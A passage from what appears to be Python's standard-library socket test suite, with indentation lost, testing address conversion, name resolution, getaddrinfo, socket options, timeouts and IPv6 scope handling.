with self.assertRaises(OSError, msg=msg % 'OSError'):
raise OSError
with self.assertRaises(OSError, msg=msg % 'socket.herror'):
raise socket.herror
with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
raise socket.gaierror
def testSendtoErrors(self):
# Testing that sendto doesn't mask failures. See #10169.
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
s.bind(('', 0))
sockname = s.getsockname()
# 2 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None)
self.assertIn('not NoneType',str(cm.exception))
# 3 args
with self.assertRaises(TypeError) as cm:
s.sendto('\u2620', 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'str'")
with self.assertRaises(TypeError) as cm:
s.sendto(5j, 0, sockname)
self.assertEqual(str(cm.exception),
"a bytes-like object is required, not 'complex'")
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, None)
self.assertIn('not NoneType', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 'bar', sockname)
self.assertIn('an integer is required', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', None, None)
self.assertIn('an integer is required', str(cm.exception))
# wrong number of args
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo')
self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if not fqhn in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in [support.HOSTv4, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test support.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [support.HOSTv4]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
def test_host_resolution_bad_address(self):
# These are all malformed IP addresses and expected not to resolve to
# any result. But some ISPs, e.g. AWS, may successfully resolve these
# IPs.
explanation = (
"resolving an invalid IP address did not raise OSError; "
"can be caused by a broken DNS server"
)
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
with self.assertRaises(OSError, msg=addr):
socket.gethostbyname(addr)
with self.assertRaises(OSError, msg=explanation):
socket.gethostbyaddr(addr)
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInvalidInterfaceNameIndex(self):
# test nonexistent interface index/name
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
# test with invalid values
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
@support.cpython_only
def testNtoHErrors(self):
import _testcapi
s_good_values = [0, 1, 2, 0xffff]
l_good_values = s_good_values + [0xffffffff]
l_bad_values = [-1, -2, 1<<32, 1<<1000]
s_bad_values = l_bad_values + [_testcapi.INT_MIN - 1,
_testcapi.INT_MAX + 1]
s_deprecated_values = [1<<16, _testcapi.INT_MAX]
for k in s_good_values:
socket.ntohs(k)
socket.htons(k)
for k in l_good_values:
socket.ntohl(k)
socket.htonl(k)
for k in s_bad_values:
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htons, k)
for k in l_bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.htonl, k)
for k in s_deprecated_values:
self.assertWarns(DeprecationWarning, socket.ntohs, k)
self.assertWarns(DeprecationWarning, socket.htons, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as there is an
# assumption breaking non-standard port/protocol entry
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
# Issue #26936: Android getservbyname() was broken before API 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
# Issue #26936: Android getservbyport() is broken.
if not support.is_android:
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Set the default timeout to 10, and see if it propagates
socket.setdefaulttimeout(10)
self.assertEqual(socket.getdefaulttimeout(), 10)
s = socket.socket()
self.assertEqual(s.gettimeout(), 10)
s.close()
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
# bpo-29972: inet_pton() doesn't fail on AIX
if not sys.platform.startswith('aix'):
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:7:8:0')
# bpo-29972: inet_pton() doesn't fail on AIX
if not sys.platform.startswith('aix'):
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6:7:8:')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = support.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
# it reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# We know a socket should start without reuse==0
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
sock.close()
self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
sock.bind((socket._LOCALHOST, 0))
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
# testing .family, .type and .protocol
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
sock.close()
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = support.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = support.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
s = socket.socket()
self.addCleanup(s.close)
try:
s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
except OSError as exc:
WSAEOPNOTSUPP = 10045
if exc.winerror == WSAEOPNOTSUPP:
self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
"doesn't implemented in this Windows version")
raise
self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if support.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
# Issue #26936: Android getaddrinfo() was broken before API level 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AddressFamily.AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test workaround for OS X platform bug segfault
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with support.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup chooses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(socket.timeout, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_socket_close(self):
sock = socket.socket()
try:
sock.bind((HOST, 0))
socket.close(sock.fileno())
with self.assertRaises(OSError):
sock.listen(1)
finally:
with self.assertRaises(OSError):
# sock.close() fails with EBADF
sock.close()
with self.assertRaises(TypeError):
socket.close(None)
with self.assertRaises(OSError):
socket.close(-1)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
with sock.makefile(mode) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
srv.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(support.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (support.HOSTv6, 0, -10))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_getaddrinfo_ipv6_basic(self):
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D', # Note capital letter `D`.
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, 0))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
hasattr(socket, 'if_nameindex'),
'if_nameindex is not supported')
def test_getaddrinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface (Linux, Mac OS X)
(ifindex, test_interface) = socket.if_nameindex()[0]
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + test_interface,
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getaddrinfo_ipv6_scopeid_numeric(self):
# Also works on Linux and Mac OS X, but is not documented (?)
# Windows, Linux and Max OS X allow nonexistent interface numbers here.
ifindex = 42
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + str(ifindex),
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
hasattr(socket, 'if_nameindex'),
'if_nameindex is not supported')
def test_getnameinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface.
(ifindex, test_interface) = socket.if_nameindex()[0]
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + test_interface, '1234'))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getnameinfo_ipv6_scopeid_numeric(self):
# Also works on Linux (undocumented), but does not work on Mac OS X
# Windows and Linux allow nonexistent interface numbers here.
ifindex = 42
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + str(ifindex), '1234'))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
